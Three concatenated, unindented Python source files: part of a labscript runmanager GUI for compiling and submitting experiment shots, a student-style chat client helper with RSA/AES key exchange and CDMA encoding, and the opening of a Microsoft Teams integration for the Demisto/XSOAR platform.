except Exception:
zprocess.raise_exception_in_thread(sys.exc_info())
continue
else:
self.output_box.output('\nWarning: globals file %s no longer exists\n' % globals_file, red=True)
try:
active_groups = ast.literal_eval(runmanager_config.get('runmanager_state', 'active_groups'))
except Exception:
pass
else:
for globals_file, group_name in active_groups:
try:
group_active_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_ACTIVE)
group_active_item.setCheckState(QtCore.Qt.Checked)
except LookupError:
warning("previously active group '%s' in %s no longer exists" % (group_name, globals_file))
try:
groups_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'groups_open'))
except Exception:
pass
else:
for globals_file, group_name in groups_open:
# First check if it exists:
try:
self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
except LookupError:
warning("previously open group '%s' in %s no longer exists" % (group_name, globals_file))
else:
self.open_group(globals_file, group_name)
try:
current_labscript_file = ast.literal_eval(
runmanager_config.get('runmanager_state', 'current_labscript_file'))
except Exception:
pass
else:
if os.path.exists(current_labscript_file):
self.ui.lineEdit_labscript_file.setText(current_labscript_file)
self.last_opened_labscript_folder = os.path.dirname(current_labscript_file)
elif current_labscript_file:
warning('previously selected labscript file %s no longer exists' % current_labscript_file)
try:
shot_output_folder = ast.literal_eval(runmanager_config.get('runmanager_state', 'shot_output_folder'))
except Exception:
pass
else:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
try:
is_using_default_shot_output_folder = ast.literal_eval(
runmanager_config.get('runmanager_state', 'is_using_default_shot_output_folder'))
except Exception:
pass
else:
if is_using_default_shot_output_folder:
default_output_folder = self.get_default_output_folder()
self.ui.lineEdit_shot_output_folder.setText(default_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(default_output_folder)
try:
send_to_runviewer = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_runviewer'))
except Exception:
pass
else:
self.ui.checkBox_view_shots.setChecked(send_to_runviewer)
try:
send_to_BLACS = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_BLACS'))
except Exception:
pass
else:
self.ui.checkBox_run_shots.setChecked(send_to_BLACS)
# clear the axes model first
if self.axes_model.rowCount():
self.axes_model.removeRows(0, self.axes_model.rowCount())
# Set the state of the global shuffle button. This ensures that if no axes items get loaded afterwards
# (e.g. because the globals in the .ini file are no longer expansion globals), then we still have
# an approximate state for the shuffle button that will apply to whatever globals are to be expanded.
try:
shuffle = ast.literal_eval(runmanager_config.get('runmanager_state', 'shuffle'))
except Exception:
pass
else:
if shuffle:
self.ui.pushButton_shuffle.setChecked(True)
# Now load the axes states (order and shuffle). This will also ensure the shuffle button matches the
# state of these items (since we don't save/restore the tri-state nature of the global shuffle button).
try:
axes = ast.literal_eval(runmanager_config.get('runmanager_state', 'axes'))
except Exception:
pass
else:
if isinstance(axes, list):
# Repopulate the model in the saved order:
for name, shuffle in axes:
self.add_item_to_axes_model(name, shuffle)
self.update_axes_indentation()
try:
BLACS_host = ast.literal_eval(runmanager_config.get('runmanager_state', 'BLACS_host'))
except Exception:
pass
else:
self.ui.lineEdit_BLACS_hostname.setText(BLACS_host)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def compile_loop(self):
while True:
try:
labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer = self.compile_queue.get()
run_files = iter(run_files) # Should already be in iterator but just in case
while True:
if self.compilation_aborted.is_set():
self.output_box.output('Compilation aborted.\n\n', red=True)
break
try:
try:
# We call next() explicitly instead of looping over run_files
# so that if compilation is aborted we won't
# create an extra file unnecessarily.
run_file = next(run_files)
except StopIteration:
self.output_box.output('Ready.\n\n')
break
else:
self.to_child.put(['compile', [labscript_file, run_file]])
signal, success = self.from_child.get()
assert signal == 'done'
if not success:
self.compilation_aborted.set()
continue
if send_to_BLACS:
self.send_to_BLACS(run_file, BLACS_host)
if send_to_runviewer:
self.send_to_runviewer(run_file)
except Exception as e:
self.output_box.output(str(e) + '\n', red=True)
self.compilation_aborted.set()
inmain(self.ui.pushButton_abort.setEnabled, False)
self.compilation_aborted.clear()
except Exception:
# Raise it so whatever bug it is gets seen, but keep going so
# the thread keeps functioning:
exc_info = sys.exc_info()
zprocess.raise_exception_in_thread(exc_info)
continue
def parse_globals(self, active_groups, raise_exceptions=True, expand_globals=True, expansion_order=None, return_dimensions=False):
sequence_globals = runmanager.get_globals(active_groups)
#logger.info('got sequence globals')
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(sequence_globals, raise_exceptions)
#logger.info('evaluated sequence globals')
if expand_globals:
if return_dimensions:
shots, dimensions = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order, return_dimensions=return_dimensions)
else:
shots = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order)
else:
shots = []
dimensions = {}
#logger.info('expanded sequence globals')
if return_dimensions:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions
else:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions
def guess_expansion_modes(self, active_groups, evaled_globals, global_hierarchy, expansions):
"""This function is designed to be called iteratively. It changes the
expansion type of globals that reference other globals - such that
globals referencing an iterable global will be zipped with it, rather
than outer producted. Each time this method is called,
self.parse_globals should also be called, so that the globals are
evaluated with their new expansion modes, if they changed. This should
be performed repeatedly until there are no more changes. Note that
this method does not return what expansion types it thinks globals
should have - it *actually writes them to the globals HDF5 file*. So
it is up to later code to ensure it re-reads the expansion mode from
the HDF5 file before proceeding. At present this method is only called
from self.preparse_globals(), so see there to see how it fits in with
everything else. This method uses four instance attributes to store
state: self.previous_evaled_globals, self.previous_global_hierarchy,
self.previous_expansion_types and self.previous_expansions. This is
necessary so that it can detect changes."""
# Do nothing if there were exceptions:
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
if isinstance(value, Exception):
# Let ExpansionErrors through, as they occur
# when the user has changed the value without changing
# the expansion type:
if isinstance(value, runmanager.ExpansionError):
continue
return False
# Did the guessed expansion type for any of the globals change?
expansion_types_changed = False
expansion_types = {}
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
new_value = evaled_globals[group_name][global_name]
try:
previous_value = self.previous_evaled_globals[group_name][global_name]
except KeyError:
# This variable is used to guess the expansion type
#
# If we already have an expansion specified for this, but
# don't have a previous value, then we should use the
# new_value for the guess as we are likely loading from HDF5
# file for the first time (and either way, don't want to
# overwrite what the user has put in the expansion type)
#
# If we don't have an expansion...
# then we set it to 0, which will result in an
# expansion type guess of '' (empty string). This will
# either result in nothing being done to the expansion
# type or the expansion type being found to be 'outer',
# which will then make it go through the machinery below
if global_name in expansions and expansions[global_name]:
previous_value = new_value
else:
previous_value = 0
new_guess = runmanager.guess_expansion_type(new_value)
previous_guess = runmanager.guess_expansion_type(previous_value)
if new_guess == 'outer':
expansion_types[global_name] = {'previous_guess': previous_guess,
'new_guess': new_guess,
'group_name': group_name,
'value': new_value
}
elif new_guess != previous_guess:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, new_guess)
expansions[global_name] = new_guess
expansion_types_changed = True
# recursively find dependencies and add them to a zip group!
def find_dependencies(global_name, global_hierarchy, expansion_types):
results = set()
for name, dependencies in global_hierarchy.items():
if name in expansion_types and global_name in dependencies:
results.add(name)
results = results.union(find_dependencies(name, global_hierarchy, expansion_types))
return results
def global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions):
if global_name not in global_hierarchy:
return False
else:
for dependency in global_hierarchy[global_name]:
if expansions[dependency]:
return True
def set_expansion_type_guess(expansion_types, expansions, global_name, expansion_to_set, new=True):
if new:
key = 'new_guess'
else:
key = 'previous_guess'
# debug logging
log_if_global(global_name, [], 'setting expansion type for new dependency' if new else 'setting expansion type for old dependencies')
# only do this if the expansion is *not* already set to a specific zip group
if global_name in expansions and expansions[global_name] != '' and expansions[global_name] != 'outer':
expansion_types[global_name][key] = expansions[global_name]
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansions[global_name], global_name))
else:
expansion_types[global_name][key] = expansion_to_set
expansions[global_name] = expansion_to_set
# debug logging
log_if_global(global_name, [], 'Setting expansion %s for %s' % (expansion_to_set, global_name))
for global_name in sorted(expansion_types):
# we have a global that does not depend on anything that has an
# expansion type of 'outer'
if (not global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions)
and not isinstance(expansion_types[global_name]['value'], runmanager.ExpansionError)):
current_dependencies = find_dependencies(global_name, global_hierarchy, expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if current_dependencies:
for dependency in current_dependencies:
set_expansion_type_guess(expansion_types, expansions, dependency, str(global_name))
set_expansion_type_guess(expansion_types, expansions, global_name, str(global_name))
for global_name in sorted(self.previous_expansion_types):
if (not global_depends_on_global_with_outer_product(
global_name, self.previous_global_hierarchy, self.previous_expansions)
and not isinstance(self.previous_expansion_types[global_name]['value'], runmanager.ExpansionError)):
old_dependencies = find_dependencies(global_name, self.previous_global_hierarchy, self.previous_expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if old_dependencies:
for dependency in old_dependencies:
if dependency in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, dependency, str(global_name), new=False)
if global_name in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, global_name, str(global_name), new=False)
for global_name, guesses in expansion_types.items():
if guesses['new_guess'] != guesses['previous_guess']:
filename = active_groups[guesses['group_name']]
runmanager.set_expansion(
filename, str(guesses['group_name']), str(global_name), str(guesses['new_guess']))
expansions[global_name] = guesses['new_guess']
expansion_types_changed = True
# Now check everything that has an expansion type not equal to outer.
# If it has one, but is not iterable, remove it from the zip group:
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
if expansions[global_name] and expansions[global_name] != 'outer':
try:
iter(evaled_globals[group_name][global_name])
except Exception:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, '')
expansion_types_changed = True
self.previous_evaled_globals = evaled_globals
self.previous_global_hierarchy = global_hierarchy
self.previous_expansion_types = expansion_types
self.previous_expansions = expansions
return expansion_types_changed
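# Conceptual sketch of what the 'outer' and zip expansion types mean for shot
# generation (an analogy only; the real expansion is performed by
# runmanager.expand_globals, not by the code below):
#
#     import itertools
#     list(itertools.product([1, 2, 3], [10, 20]))  # 'outer': 3 x 2 = 6 combinations
#     list(zip([1, 2, 3], [10, 20, 30]))            # zip group: values step together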
def make_h5_files(self, labscript_file, output_folder, sequence_globals, shots, shuffle):
mkdir_p(output_folder) # ensure it exists
sequence_id = runmanager.generate_sequence_id(labscript_file)
run_files = runmanager.make_run_files(output_folder, sequence_globals, shots, sequence_id, shuffle)
logger.debug(run_files)
return labscript_file, run_files
def send_to_BLACS(self, run_file, BLACS_hostname):
port = int(self.exp_config.get('ports', 'BLACS'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
self.output_box.output('Submitting run file %s.\n' % os.path.basename(run_file))
try:
response = zprocess.zmq_get(port, BLACS_hostname, data=agnostic_path)
if 'added successfully' in response:
self.output_box.output(response)
else:
raise Exception(response)
except Exception as e:
self.output_box.output('Couldn\'t submit job to control server: %s\n' % str(e), red=True)
self.compilation_aborted.set()
def send_to_runviewer(self, run_file):
runviewer_port = int(self.exp_config.get('ports', 'runviewer'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
try:
response = zprocess.zmq_get(runviewer_port, 'localhost', data='hello', timeout=1)
if 'hello' not in response:
raise Exception(response)
except Exception as e:
logger.info('runviewer not running, attempting to start...')
# Runviewer not running, start it:
if os.name == 'nt':
creationflags = 0x00000008 # DETACHED_PROCESS from the win32 API
subprocess.Popen([sys.executable, '-m', 'runviewer'],
creationflags=creationflags, stdout=None, stderr=None,
close_fds=True)
else:
devnull = open(os.devnull, 'w')
if not os.fork():
os.setsid()
subprocess.Popen([sys.executable, '-m', 'runviewer'],
stdin=devnull, stdout=devnull, stderr=devnull, close_fds=True)
os._exit(0)
try:
zprocess.zmq_get(runviewer_port, 'localhost', data='hello', timeout=15)
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
try:
response = zprocess.zmq_get(runviewer_port, 'localhost', data=agnostic_path, timeout=0.5)
if 'ok' not in response:
raise Exception(response)
else:
self.output_box.output('Shot %s sent to runviewer.\n' % os.path.basename(run_file))
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
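# The POSIX branch above forks and calls setsid() so the launched runviewer outlives
# (and is detached from) this process. The same pattern in isolation (illustrative;
# 'some_program' is a placeholder):
#
#     import os, subprocess
#     if not os.fork():                      # in the child
#         os.setsid()                        # new session, detached from the parent
#         subprocess.Popen(['some_program'], close_fds=True)
#         os._exit(0)                        # child exits; grandchild keeps running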
if __name__ == "__main__":
logger = setup_logging('runmanager')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = KeyPressQApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = RunManager()
qapplication.keyPress.connect(app.on_keyPress)
qapplication.keyRelease.connect(app.on_keyRelease)
sys.exit(qapplication.exec_())
|
client_helper.py
|
import json
import pickle
import sys
import time
from threading import Thread
from random import Random
from bitarray import bitarray
from bitarray.util import hex2ba, ba2hex
from chat_bot import Bot
from udp_handler import Tracker
from chat_client import Chat
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
class ClientHelper:
def __init__(self, client):
self.client = client
self.client_id = -1
self.username = ""
self.menu_table = {}
self.connected = False
self.option = -1
self.udp_tracker = None
self.udp_binding = ()
self.keys = RSA.generate(2048)
self.chat_channel = None
self.private_key = None
self.public_key = None
self.chat_private_key = None
self.chat_public_key = None
self.bot = None
self.botPresent = False
self.botName = ''
self.botOptions = ''
def create_request(self, option=0):
"""
:return: the created request
"""
request = {'payload': None, 'headers': {}}
if option == 0 and not self.connected: # Even though logic checks are performed elsewhere this is just a backup
# initial connection request
request = {'payload': None, 'headers': {'option': 0, 'username': self.username}}
return request
elif option == 1:
request = {'payload': None, 'headers': {'option': 1}}
return request
elif option == 2:
# create a request using the message and recipient
message = input('Enter your message: ')
recipient = int(input('Enter recipient id: '))
request = {'payload': message,
'headers': {'option': 2, 'recipient': ('127.0.0.1', recipient)}}
return request
elif option == 3:
request = {'payload': None, 'headers': {'option': 3}}
elif option == 4:
binding = tuple(input("Enter the address to bind your UDP client (e.g. 127.0.0.1:9000): ").split(':'))
recipient = tuple(input("Enter the recipient address: ").split(':'))
message = input("Enter the message: ")
serialized_message = pickle.dumps(message)
if not self.udp_tracker:
self.udp_binding = binding
self.udp_tracker = Tracker(self.udp_binding)
else:
print(f'User has UDP client bound to {self.udp_binding}')
self.udp_tracker.send(serialized_message, recipient)
Thread(target=self.udp_handler, args=(self.udp_tracker,)).start()
request = {'payload': None, 'headers': {'option': 4}}
elif option == 5:
message = input("Enter message: ")
bit_message = self.cdma_encode(message)
request = {'payload': bit_message, 'headers': {'option': 5}}
elif option == 6:
channel = 0
while int(channel) < 100 or int(channel) > 65000:
channel = input("Enter the new channel ID: ")
self.chat_channel = channel
self.private_key = self.keys.export_key()
self.public_key = self.keys.public_key().export_key()
request = {'payload': None, 'headers': {'option': 6, 'channel': self.chat_channel, 'public_key': self.public_key}}
elif option == 7:
channel = 0
while int(channel) < 100 or int(channel) > 65000:
channel = input("Enter the new channel ID: ")
self.chat_channel = channel
self.private_key = self.keys.export_key()
self.public_key = self.keys.public_key().export_key()
request = {'payload': None, 'headers': {'option': 7, 'channel': self.chat_channel, 'public_key': self.public_key}}
elif option == 8:
name = input("Enter the name of your bot: ")
print('\nThe available permissions of this bot are:\n1. Welcome Users right after they join the channel.')
print('2. Show a warning to the user when they send words not allowed\n3. Drop users from the channel after 3 warnings')
print('4. Compute response time of a message when the user requests it\n5. Inform the user when it has been inactive for 5 minutes\n')
options = input("Enter integers (no spaces) to enable permission for bot: ")
request = {'payload': None, 'headers': {'option': 8, 'bot': name, 'options': options}}
elif option == 9:
request = {'payload': None, 'headers': {'option': 9}}
print("\nRouting table requested, waiting for response....\n\n")
elif option == 10:
request = {'payload': None, 'headers': {'option': 10}}
print("\nLink state table requested, waiting for response....\n\n")
elif option == 11:
request = {'payload': None, 'headers': {'option': 11}}
print("\nDistance vector table requested, waiting for response....\n\n")
elif option == 12:
request = {'payload': None, 'headers': {'option': 12}}
elif option == 13:
# disconnect from server
request = {'payload': None, 'headers': {'option': 13}}
return request
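# Example of the request shape this method produces (illustrative values only):
#
#     {'payload': 'hello there',
#      'headers': {'option': 2, 'recipient': ('127.0.0.1', 4)}}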
def send_request(self, request):
"""
:request: a request representing deserialized data.
"""
self.client.send(request)
def process_response(self):
"""
Receives the serialized response from the server and processes it.
"""
data = self.client.receive()
# print(data)
if not self.connected and 'clientid' in data['headers']:
self.connected = True
self.client_id = data['headers']['clientid']
print(
"Your client info:\nClient Name: {}\nClient ID: {}".format(self.username, data['headers']['clientid']))
distances = self.update_table()
request = {'payload': distances, 'headers': {'option': 100}}
self.send_request(request)
self.process_response()
if data['ack'] == 0:
menu = data['payload']
self.menu_table = json.loads(menu)
if data['ack'] == 1:
print('\n')
for key, value in data['payload'].items():
print(f'{key}:{value}', sep=',')
elif data['ack'] == 2:
print("Message sent!")
elif data['ack'] == -2:
print("User is not available to message")
elif data['ack'] == 3:
missed_messages = 0
for key, value in data['payload'].items():
missed_messages = missed_messages + len(value)
if not data['payload']:
print('You have no new messages')
return
else:
print(f'Number of unread messages: {missed_messages}')
for message_list in data['payload'].values():
for message in message_list:
if isinstance(message[1], bitarray):
decoded_message = self.cdma_decode(message[1], message[3])
date_time = message[0].split("T")
print(f'{date_time[0]} {date_time[1]}: {decoded_message} ({message[2]})')
continue
else:
date_time = message[0].split("T")
print(f'{date_time[0]} {date_time[1]}: {message[1]} ({message[2]})')
elif data['ack'] == 4:
pass
elif data['ack'] == 5:
print("Message broadcast!")
elif data['ack'] == 6:
nonce = data['payload'][1]
enc_session = data['payload'][0]
cipherRSA = PKCS1_OAEP.new(RSA.import_key(self.private_key))
session = cipherRSA.decrypt(enc_session)
cipherAES = AES.new(session, AES.MODE_EAX, nonce)
key = cipherAES.decrypt_and_verify(data['payload'][3], data['payload'][2])
self.chat_private_key = key
self.chat_public_key = data['payload'][4]
print(f'\nPrivate key received from server and channel {self.chat_channel} was created!')
chat = Chat(self.chat_channel, self.username, data['payload'], True)
thread = None
if self.botPresent:
self.bot.setPort(int(self.chat_channel))
thread = Thread(target=self.bot.run)
thread.start()
self.udp_handler(chat)
if thread:
thread.join(0.25)
self.bot.udpSocket.close()
elif data['ack'] == 7:
nonce = data['payload'][1]
enc_session = data['payload'][0]
cipherRSA = PKCS1_OAEP.new(RSA.import_key(self.private_key))
session = cipherRSA.decrypt(enc_session)
cipherAES = AES.new(session, AES.MODE_EAX, nonce)
key = cipherAES.decrypt_and_verify(data['payload'][3], data['payload'][2])
self.chat_private_key = key
self.chat_public_key = data['payload'][4]
chat = Chat(self.chat_channel, self.username, data['payload'], False, data['users'], data['admin'])
self.udp_handler(chat)
elif data['ack'] == 8:
print("\n\n")
self.botPresent = True
self.botName = data['name']
self.botOptions = data['options']
self.bot = Bot(int(9000), self.botOptions, self.botName)
elif data['ack'] == 9:
mapping = data['payload']
names = data['names']
i = 0
print('---------- Network Map ----------\n\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mapping:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
elif data['ack'] == 10:
mapping = data['payload']
names = data['names']
destination = data['destination']
routes = data['routes']
cost = data['cost']
for i in range(len(names)-1):
cost[i] = mapping[0][i + 1]
routes[i] = [destination[i]]
for j in range(1, len(names)):
currentCost = cost[j - 1]
for k in range(j, len(names) - 1):
if (mapping[j][k + 1] + mapping[0][k]) < currentCost:
temp = routes[j - 1].pop()
routes[j - 1].append(names[j + 1])
routes[j - 1].append(temp)
cost[j - 1] = mapping[j][k + 1] + mapping[0][k]
titles = ['Destination', 'Path', 'Cost']
print(f'Routing table for {self.username} (id:{self.client_id}) computed with Link State Protocol\n')
for title in titles:
print('\t{:^20s}'.format(title), end='\t|')
print('\n')
for i in range(len(destination)):
print('\t{:^20s}'.format(destination[i]), end='\t|')
print('\t{:^20s}'.format(str(routes[i])), end='\t|')
print('\t{:^20d}'.format(cost[i]), end='\t|')
print('\n')
elif data['ack'] == 11:
mapping = data['map']
names = data['names']
mPrime = data['payload']
i = 0
print('---------- Network Map ----------\n\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mapping:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
i = 0
print('Routing table computed with DVP:\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mPrime:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
elif data['ack'] == 12:
print("Might you consider a subscription to ExpressVPN today?")
elif data['ack'] == 13:
print("Closing connection...")
elif data['ack'] == 100:
print('Distance values updated in server...')
elif data['ack'] == -1:
print("Something went wrong, please try again...")
@staticmethod
def print_menu(menu):
print("\n\n")
for heading in menu['titles']:
print(heading)
for option, title in menu['options'].items():
print(option + ": " + title)
option = int(input("\n\nOption <Enter a number>: "))
while option not in range(1, 14):
option = int(input("\nInvalid entry, choose another option:"))
return option
@staticmethod
def udp_handler(tracker):
tracker.run()
def cdma_encode(self, message):
# standard 4-channel orthogonal codes from generic walsh table
codes = [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]]
userCode = codes[(self.client_id % 4)]
encoded_message = message.encode('utf-8')
raw_data = bitarray(hex2ba(encoded_message.hex()))
expanded_data = bitarray()
for bit in raw_data:
for i in range(4):
expanded_data.append(bit)
expanded_code = bitarray(bitarray(userCode) * len(encoded_message) * 8)
encrypted_message = expanded_code ^ expanded_data
return encrypted_message
@staticmethod
def cdma_decode(message, sender_id):
codes = [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]]
userCode = codes[(sender_id % 4)]
length = (len(message) // 4)
decryption_code = bitarray(bitarray(userCode) * length)
decrypted_stream = message ^ decryption_code
compressed_data = decrypted_stream[0::4]
message = ba2hex(compressed_data)
message = bytes.fromhex(message).decode('utf-8')
return message
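# Round-trip sketch for the two CDMA helpers above (illustrative; assumes the sender
# and receiver agree on the sender's id so that the same Walsh code is selected):
#
#     helper = ClientHelper(client=None)   # hypothetical construction for the sketch
#     helper.client_id = 5                 # selects code index 5 % 4 == 1
#     bits = helper.cdma_encode('hi')
#     ClientHelper.cdma_decode(bits, 5)    # -> 'hi'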
''' Data for the routing table is simulated for 3 users other than the current one.
This was done to expedite testing and minimize the need for VM instances.
The rest of the table is simulated by the server so that the link state and routing
tables can be computed.
'''
@staticmethod
def update_table():
distance = [0]
for i in range(3):
rand = Random()
distance.append(rand.randint(1, 30))
return distance
def start(self):
"""
initialize process for ClientHelper
"""
self.username = input("Enter a username: ")
# used for quicker debugging
# self.username = "Jarett"
request = self.create_request()
self.send_request(request)
self.process_response()
while self.option != 13:
self.option = self.print_menu(self.menu_table)
request = self.create_request(self.option)
self.send_request(request)
self.process_response()
self.client.close()
time.sleep(2)
sys.exit()
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
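# For example (illustrative): epoch_seconds(datetime(1970, 1, 1, 0, 1)) returns 60,
# and epoch_seconds() with no argument returns the current UTC time as epoch seconds.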
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
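# Illustrative direct messages that the parsing above accepts (names/types are examples only):
#   'new incident name=Phishing attempt type=Phishing'
#   'create incident json={"name": "Phishing attempt", "type": "Phishing"}'
# Either the name/type form or the json form may be used, but not both in the same message.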
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
    Turns URLs into markdown hyperlinks
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
